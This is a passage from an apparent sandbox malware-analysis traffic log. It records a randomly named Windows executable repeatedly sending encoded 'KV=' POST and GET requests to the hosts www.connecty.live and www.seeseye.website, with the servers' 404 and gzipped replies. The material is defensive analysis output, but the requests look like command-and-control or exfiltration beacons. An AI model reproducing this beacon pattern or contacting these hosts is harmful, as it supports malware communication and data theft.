                                                                                                                        Data Raw: 4b 56 3d 37 54 71 35 63 4d 4f 55 4f 73 44 79 75 70 44 37 4d 53 36 54 35 56 79 7a 57 71 41 47 77 49 5a 30 2f 57 5a 5a 48 6c 53 42 4a 4f 38 56 63 54 57 53 4f 77 42 62 50 6d 2f 70 33 59 78 30 50 48 57 65 62 6d 65 6b 6d 6c 72 32 6d 46 58 50 64 70 30 79 6d 41 78 55 45 6b 65 48 41 6e 6d 7a 46 43 37 35 2f 48 32 6b 52 79 33 6a 36 2f 78 41 48 78 6f 4a 68 49 37 35 36 6d 2b 6d 6e 52 37 6c 6f 37 6b 6e 57 35 4a 41 63 78 45 6d 4a 2f 34 62 39 6f 4a 33 4c 62 79 62 73 53 78 53 63 4e 50 73 62 2b 62 55 59 4f 43 6b 65 54 4a 72 30 57 54 6b 4a 79 73 33 68 73 68 32 36 63 38 36 6b 36 5a 6b 52 50 2f 66 67 6d 39 4b 66 7a 68 64 50 70 6f 74 6d 64 73 30 52 6a 50 4a 55 46 41 3d
                                                                                                                        Data Ascii: KV=7Tq5cMOUOsDyupD7MS6T5VyzWqAGwIZ0/WZZHlSBJO8VcTWSOwBbPm/p3Yx0PHWebmekmlr2mFXPdp0ymAxUEkeHAnmzFC75/H2kRy3j6/xAHxoJhI756m+mnR7lo7knW5JAcxEmJ/4b9oJ3LbybsSxScNPsb+bUYOCkeTJr0WTkJys3hsh26c86k6ZkRP/fgm9KfzhdPpotmds0RjPJUFA=
                                                                                                                        Nov 20, 2024 16:55:47.294482946 CET658INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 514
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        23192.168.2.1149999203.161.43.228803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:48.708125114 CET1810OUTPOST /q6ws/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.connecty.live
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.connecty.live
                                                                                                                        Referer: http://www.connecty.live/q6ws/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 37 54 71 35 63 4d 4f 55 4f 73 44 79 75 70 44 37 4d 53 36 54 35 56 79 7a 57 71 41 47 77 49 5a 30 2f 57 5a 5a 48 6c 53 42 4a 4f 30 56 63 68 75 53 49 6a 5a 62 4f 6d 2f 70 30 59 78 31 50 48 57 50 62 6d 32 6f 6d 6c 57 44 6d 48 66 50 50 65 63 79 33 69 5a 55 4b 55 65 48 43 6e 6d 32 4c 69 37 73 2f 48 47 34 52 79 6e 6a 36 2f 78 41 48 77 59 4a 33 4a 37 35 32 47 2b 68 33 42 37 78 73 37 6b 50 57 35 68 36 63 77 77 59 4b 4f 59 62 39 49 5a 33 51 4f 6d 62 6b 53 78 51 52 74 4f 2f 62 2b 57 4b 59 4b 69 6f 65 54 56 46 30 55 44 6b 4b 7a 52 78 34 2f 42 5a 68 4e 67 54 32 72 35 6a 53 4b 48 59 6f 30 6c 4b 63 68 63 75 63 63 6b 2b 37 6f 52 64 4a 6d 54 34 51 43 44 6d 41 57 7a 79 75 48 6e 43 68 50 42 4a 73 51 5a 49 2b 79 34 7a 7a 72 69 67 53 35 36 35 46 6a 32 4f 72 62 4b 6e 59 68 43 51 79 35 6a 42 36 78 55 33 75 79 56 45 46 31 44 59 53 33 5a 6a 44 6e 53 74 74 38 4c 63 47 30 54 65 37 43 36 36 36 32 39 52 53 62 36 75 56 74 4f 75 4d 48 47 41 59 5a 61 6f 6b 42 63 38 31 6e 6b 59 4d 32 31 49 34 47 34 34 79 6e 63 55 42 66 2f [TRUNCATED]
                                                                                                                        Data Ascii: KV=7Tq5cMOUOsDyupD7MS6T5VyzWqAGwIZ0/WZZHlSBJO0VchuSIjZbOm/p0Yx1PHWPbm2omlWDmHfPPecy3iZUKUeHCnm2Li7s/HG4Rynj6/xAHwYJ3J752G+h3B7xs7kPW5h6cwwYKOYb9IZ3QOmbkSxQRtO/b+WKYKioeTVF0UDkKzRx4/BZhNgT2r5jSKHYo0lKchcucck+7oRdJmT4QCDmAWzyuHnChPBJsQZI+y4zzrigS565Fj2OrbKnYhCQy5jB6xU3uyVEF1DYS3ZjDnStt8LcG0Te7C66629RSb6uVtOuMHGAYZaokBc81nkYM21I4G44yncUBf/jxjTyAAeQ2tBtW2BvrXse802dC8thAP4mZ2pSihbyrOKixZPITt9xMzFhfM4g4hgtY29bd5D9t9u1/lPvuJvDd9atBsUZJ30lmlV0/2Z4UiW266uEU4LyrdfUdsZhYjevj/9Dq2tomUr5hZ/D4X9cATglsFOk/TY2AMe5NiFHoBCb7pZ/kQbVk93pnbijdxpmONFXLzCpPEVfMl4E2EbL3HWdNc/Ksl54yIpHkEMdqgDpWa/8m46u1r73g0Fi+gM48jJ5oq9I/LbShbOOVA2B+O5JPtxOrCr65t7jhiDxXnkdRcr/5UdOduxfBQDibC9TFQ/ypZW48dDJa8j4XXdfuG+Vw8Ldhg8yUlSVI5436ngxp6aCFM8k9t/5rPe/IGZobkzgpZXu+ClmFEI4cK1LRVitmylgH5qLGvYF8cvHpYyn52L02wBh4DONmXFFUFG+CfVKcZo9yjzxJflJxwlqXzCJZjC+sZZ/o4ciznLPVrAbcIfD1ZCIrqEcyww2MDSrpuOuinzDdXT/uonUB7LakY2ZPeDNayAJzF290PElqj8PSZt7rZz4ir0Oi37xTB3dpzGhKquYcH8v8GzyGN7QW5vDO5Ztncp31ujlpz1A04A0XtqgGiNRYBoqS+qvBH50ALTnYJ9X93bUqbOvsa8nfFlr2eVc0wTMM [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:55:50.040666103 CET658INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 514
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        24192.168.2.1150000203.161.43.228803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:51.375801086 CET505OUTGET /q6ws/?KV=2RCZf5GiD+fToLXcMHisxCqwWbc28bp5zmUuGnuHZcsPDzCWfzFSI1Df4pF2LDKbQ3OqnVWPrFqSO4182xFWIWWOBmKrBRiY7XTQRir+3P1LJShw3pPG+Dk=&Wno=a0qDq HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Host: www.connecty.live
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Nov 20, 2024 16:55:52.637221098 CET673INHTTP/1.1 404 Not Found
                                                                                                                        Date: Wed, 20 Nov 2024 15:55:52 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 514
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        25192.168.2.1150001103.224.182.242803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:55:58.974507093 CET783OUTPOST /37ym/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.seeseye.website
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 199
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.seeseye.website
                                                                                                                        Referer: http://www.seeseye.website/37ym/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 78 39 46 66 6c 70 74 64 32 78 4d 49 54 4a 39 44 53 5a 45 6b 2b 67 61 57 59 64 4a 74 64 52 52 5a 43 71 42 4c 51 66 65 2b 31 69 2b 56 54 45 4e 2f 67 48 6d 64 5a 62 57 52 6e 71 71 64 58 2b 34 45 61 6a 65 4f 61 58 47 71 77 59 4a 2b 46 64 35 39 68 58 63 6b 52 35 74 71 54 36 4c 46 50 39 69 42 70 61 2f 79 43 45 77 57 51 69 52 78 61 45 71 32 56 73 79 78 50 72 6d 6c 53 6e 31 39 6d 4d 47 71 7a 48 79 57 5a 71 47 49 6f 56 6d 6c 76 4b 34 62 56 4a 33 37 2b 70 50 70 49 70 2b 37 48 52 68 7a 5a 66 35 4c 57 43 67 33 33 4c 34 55 74 44 31 71 57 69 6a 6a 65 59 6c 38 68 79 53 72 74 76 44 6b 70 77 3d 3d
                                                                                                                        Data Ascii: KV=x9Fflptd2xMITJ9DSZEk+gaWYdJtdRRZCqBLQfe+1i+VTEN/gHmdZbWRnqqdX+4EajeOaXGqwYJ+Fd59hXckR5tqT6LFP9iBpa/yCEwWQiRxaEq2VsyxPrmlSn19mMGqzHyWZqGIoVmlvK4bVJ37+pPpIp+7HRhzZf5LWCg33L4UtD1qWijjeYl8hySrtvDkpw==
                                                                                                                        Nov 20, 2024 16:56:00.289736032 CET874INHTTP/1.1 200 OK
                                                                                                                        date: Wed, 20 Nov 2024 15:56:00 GMT
                                                                                                                        server: Apache
                                                                                                                        set-cookie: __tad=1732118160.6524404; expires=Sat, 18-Nov-2034 15:56:00 GMT; Max-Age=315360000
                                                                                                                        vary: Accept-Encoding
                                                                                                                        content-encoding: gzip
                                                                                                                        content-length: 579
                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                        connection: close
                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a7 08 b6 02 89 e5 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 d1 50 d7 96 51 d1 a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 58 e4 c7 70 54 78 e5 74 4f 40 fb 1e 45 4c 78 4f f9 ad dc ca 63 34 06 ef 94 88 f3 5b 9f d7 da ac d1 f5 4e 1b ca b5 ae 31 eb b4 c9 6e 7d 5c 16 f9 11 fb 56 aa 32 da 4a 07 0e 2b ed 50 d1 9f 56 9b 3b 10 90 34 44 fd 22 cf 77 bb 5d f6 4a 62 3e bf da 77 f9 e7 64 19 45 79 0e 37 48 20 81 74 87 76 43 60 6b 98 cf 66 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 0d 21 03 9f ea 80 ae 81 1a 84 17 f2 a1 77 b6 d3 9e 63 52 b7 1e 6a eb c0 db 0e 99 22 bd 35 51 bd 31 8a b4 35 7c dc b6 2b a9 ee ae c7 54 e9 14 1e a2 c9 4e 9b ca ee b2 d6 2a 19 50 99 c3 be 95 0a d3 7f 8c 9d 27 75 2f 2e ae 92 e9 32 3a 44 11 b9 7d 60 b2 4a 4f e0 2a f7 6b 34 21 c0 23 8d 9b f4 75 b5 0f c1 20 f3 27 a1 6b 75 ff 73 d4 2c e0 eb b3 93 ef 37 ac 43 56 e9 43 67 8d 26 cb a1 f5 22 c8 f6 78 08 [TRUNCATED]
                                                                                                                        Data Ascii: Tn0=_A;jnAX-y4(7C-==rPQAZ,==f;\yMXpTxtO@ELxOc4[N1n}\V2J+PV;4D"w]Jb>wdEy7H tvC`kfiGeM,=!wcRj"5Q15|+TN*P'u/.2:D}`JO*k4!#u 'kus,7CVCg&"x+L2nID5)/~R83Il}(Z0|>OPf `jRtna=2l];1rv@L^mY=v6,["gkpa-0ju:"|2vTtH^px"-5=eC/uy0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        26192.168.2.1150002103.224.182.242803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:01.642092943 CET803OUTPOST /37ym/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.seeseye.website
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 219
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.seeseye.website
                                                                                                                        Referer: http://www.seeseye.website/37ym/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 78 39 46 66 6c 70 74 64 32 78 4d 49 51 70 74 44 51 36 63 6b 35 41 61 4a 45 4e 4a 74 55 78 52 43 43 71 39 4c 51 64 79 55 31 51 4b 56 51 68 70 2f 68 44 4b 64 61 62 57 52 6f 36 71 53 5a 65 35 49 61 6a 53 73 61 58 36 71 77 65 6c 2b 46 64 70 39 68 47 63 6a 54 70 74 6f 59 61 4c 44 52 4e 69 42 70 61 2f 79 43 46 51 6f 51 69 4a 78 47 6c 36 32 48 39 79 79 46 4c 6d 6d 46 58 31 39 31 63 48 74 7a 48 79 4f 5a 72 61 75 6f 54 71 6c 76 4b 49 62 62 34 33 34 33 70 4f 69 4c 5a 2f 5a 58 45 41 61 55 63 73 49 66 6a 55 77 2b 70 30 75 6f 46 34 77 47 42 71 30 64 4c 74 2b 31 55 7a 62 6b 65 6d 74 79 2f 36 58 37 68 37 6a 4f 44 34 46 51 4a 58 43 65 50 6f 30 68 7a 41 3d
                                                                                                                        Data Ascii: KV=x9Fflptd2xMIQptDQ6ck5AaJENJtUxRCCq9LQdyU1QKVQhp/hDKdabWRo6qSZe5IajSsaX6qwel+Fdp9hGcjTptoYaLDRNiBpa/yCFQoQiJxGl62H9yyFLmmFX191cHtzHyOZrauoTqlvKIbb4343pOiLZ/ZXEAaUcsIfjUw+p0uoF4wGBq0dLt+1Uzbkemty/6X7h7jOD4FQJXCePo0hzA=
                                                                                                                        Nov 20, 2024 16:56:02.889866114 CET874INHTTP/1.1 200 OK
                                                                                                                        date: Wed, 20 Nov 2024 15:56:02 GMT
                                                                                                                        server: Apache
                                                                                                                        set-cookie: __tad=1732118162.4255567; expires=Sat, 18-Nov-2034 15:56:02 GMT; Max-Age=315360000
                                                                                                                        vary: Accept-Encoding
                                                                                                                        content-encoding: gzip
                                                                                                                        content-length: 579
                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                        connection: close
                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a7 08 b6 02 89 e5 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba 43 ab 8b 2d ea 3d f2 3d 9a 72 d1 50 d7 96 51 d1 a0 ac f8 41 9a 5a 2c 3d a2 c7 3d 66 3b 5c 79 4d 58 e4 c7 70 54 78 e5 74 4f 40 fb 1e 45 4c 78 4f f9 ad dc ca 63 34 06 ef 94 88 f3 5b 9f d7 da ac d1 f5 4e 1b ca b5 ae 31 eb b4 c9 6e 7d 5c 16 f9 11 fb 56 aa 32 da 4a 07 0e 2b ed 50 d1 9f 56 9b 3b 10 90 34 44 fd 22 cf 77 bb 5d f6 4a 62 3e bf da 77 f9 e7 64 19 45 79 0e 37 48 20 81 74 87 76 43 60 6b 98 cf 66 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 0d 21 03 9f ea 80 ae 81 1a 84 17 f2 a1 77 b6 d3 9e 63 52 b7 1e 6a eb c0 db 0e 99 22 bd 35 51 bd 31 8a b4 35 7c dc b6 2b a9 ee ae c7 54 e9 14 1e a2 c9 4e 9b ca ee b2 d6 2a 19 50 99 c3 be 95 0a d3 7f 8c 9d 27 75 2f 2e ae 92 e9 32 3a 44 11 b9 7d 60 b2 4a 4f e0 2a f7 6b 34 21 c0 23 8d 9b f4 75 b5 0f c1 20 f3 27 a1 6b 75 ff 73 d4 2c e0 eb b3 93 ef 37 ac 43 56 e9 43 67 8d 26 cb a1 f5 22 c8 f6 78 08 [TRUNCATED]
                                                                                                                        Data Ascii: Tn0=_A;jnAX-y4(7C-==rPQAZ,==f;\yMXpTxtO@ELxOc4[N1n}\V2J+PV;4D"w]Jb>wdEy7H tvC`kfiGeM,=!wcRj"5Q15|+TN*P'u/.2:D}`JO*k4!#u 'kus,7CVCg&"x+L2nID5)/~R83Il}(Z0|>OPf `jRtna=2l];1rv@L^mY=v6,["gkpa-0ju:"|2vTtH^px"-5=eC/uy0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        27192.168.2.1150003103.224.182.242803920C:\Program Files (x86)\DkgTwkShXHuYDwaqqanQdFDSSNoagfNaOHzsMlnyQXYDHeHS\zfEzkYXCOLr.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 20, 2024 16:56:04.313740969 CET1816OUTPOST /37ym/ HTTP/1.1
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Host: www.seeseye.website
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1231
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.seeseye.website
                                                                                                                        Referer: http://www.seeseye.website/37ym/
                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                                                                                                                        Data Raw: 4b 56 3d 78 39 46 66 6c 70 74 64 32 78 4d 49 51 70 74 44 51 36 63 6b 35 41 61 4a 45 4e 4a 74 55 78 52 43 43 71 39 4c 51 64 79 55 31 51 53 56 51 54 68 2f 67 69 4b 64 62 62 57 52 75 4b 72 31 5a 65 35 42 61 6a 36 6f 61 58 32 55 77 64 52 2b 45 37 6c 39 31 69 6f 6a 5a 70 74 6f 58 36 4c 47 50 39 6a 42 70 61 76 32 43 45 38 6f 51 69 4a 78 47 6e 53 32 45 73 79 79 57 62 6d 6c 53 6e 31 4c 6d 4d 48 4a 7a 48 4b 77 5a 72 65 2b 6f 6a 4b 6c 73 75 73 62 58 71 50 34 72 35 4f 67 43 4a 2f 2f 58 45 45 42 55 63 67 69 66 6a 67 61 2b 71 55 75 71 43 4e 2f 55 44 71 43 43 72 74 4e 6a 6b 43 67 35 73 61 59 72 4a 61 71 72 44 58 48 61 46 67 4e 63 70 4f 72 44 4b 41 33 31 57 67 79 43 44 61 71 79 59 30 57 32 58 45 47 69 38 58 35 75 6f 7a 39 68 4d 48 72 71 48 61 6e 7a 47 62 78 49 42 68 50 59 2f 30 4a 64 4a 2b 50 6b 62 79 65 5a 33 59 78 47 57 6e 36 4b 34 54 58 63 69 6e 46 47 55 66 50 6f 77 6b 71 66 68 54 2b 59 75 6a 62 37 72 78 49 68 32 44 51 78 42 6a 43 71 51 49 4c 37 71 75 35 72 43 68 69 4c 6c 69 7a 54 76 62 4e 74 54 46 4c 4f 47 64 [TRUNCATED]
                                                                                                                        Data Ascii: KV=x9Fflptd2xMIQptDQ6ck5AaJENJtUxRCCq9LQdyU1QSVQTh/giKdbbWRuKr1Ze5Baj6oaX2UwdR+E7l91iojZptoX6LGP9jBpav2CE8oQiJxGnS2EsyyWbmlSn1LmMHJzHKwZre+ojKlsusbXqP4r5OgCJ//XEEBUcgifjga+qUuqCN/UDqCCrtNjkCg5saYrJaqrDXHaFgNcpOrDKA31WgyCDaqyY0W2XEGi8X5uoz9hMHrqHanzGbxIBhPY/0JdJ+PkbyeZ3YxGWn6K4TXcinFGUfPowkqfhT+Yujb7rxIh2DQxBjCqQIL7qu5rChiLlizTvbNtTFLOGd+EzXqIeu2i2as/WyFY1a+2PI0oD66lMpEtPAXaaYT4gXxSKslpOS2LoLJdU2odWjkqKXhyp7AP8jR+O2QeHwfuDolwZplg52HvKdyi3d4C0X910lE3ZOhK6KG0LA/NRWjxE1RGxHcCE583UyuqAnYJETXiAGGVZ+mjCg5zd6/ZTJtWuckpLwEvUSwBJDxoscSpkMazCk1Tezzup1souG016bvsoywCysSzu5elBz5lhq69mqa+9vq8Zo0is1QiK291PiGIhTfGoRAEGw5DgNPuFEpqjUsMxBDSE0zk1H0z8g2bdRiUMp7vwUlKbhLrkNImLb6hSBBX+7o4r3X/p4s2tIt00qHmm9Dli6ErySkkeNWeyrKdhDO/KOIUzwySPI7VL8+V0nGaATCT5f6LvalAbxoYkJ2gjsMXXk9RxdH0CLRFlc3Kh6txxU7ZIOIeqM83osk5ItF5HmfVmwLuoG6/RUpYO7nhhjrqDNPcGoQ5hhi/qF/6buQrRNp1FIag/FigCVreDskrSibd/nZPPiUnrdfQ1VBX7BQfZ83UmnYXcARwerYkMpRFXUc9g2EzdIDpIYKol+WX6CFAeKD0aDzH6mP9NTZnzL1L+peuXGZypZH0iKeTiUi82WKYIBj13EvQtj/hATV6rMlSpF9sKUwzDPhX3IkR5D9h [TRUNCATED]
                                                                                                                        Nov 20, 2024 16:56:05.733294964 CET874INHTTP/1.1 200 OK
                                                                                                                        date: Wed, 20 Nov 2024 15:56:05 GMT
                                                                                                                        server: Apache
